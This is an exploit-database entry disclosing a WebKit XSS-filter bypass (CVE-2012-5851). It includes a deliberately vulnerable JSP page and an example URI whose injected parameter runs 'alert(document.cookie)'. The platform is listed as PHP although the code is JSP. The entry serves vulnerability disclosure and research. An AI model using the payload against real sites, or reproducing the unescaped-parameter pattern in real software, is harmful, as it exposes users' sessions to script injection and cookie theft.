WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass

EDB-ID:

38024

CVE:

2012-5851

EDB Verified:

Author:

Tushar Dalvi

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2012-07-19

Vulnerable App:

source: https://www.securityfocus.com/bid/56570/info

WebKit is prone to a security-bypass vulnerability.

An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials. 

Code in test.jsp:

<title>Test Page</title>
<script>
var foo = "<%= request.getParameter("foo") %>";
document.write("<text>Welcome "+ foo + "</text>");
</script>

Example URI:

http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services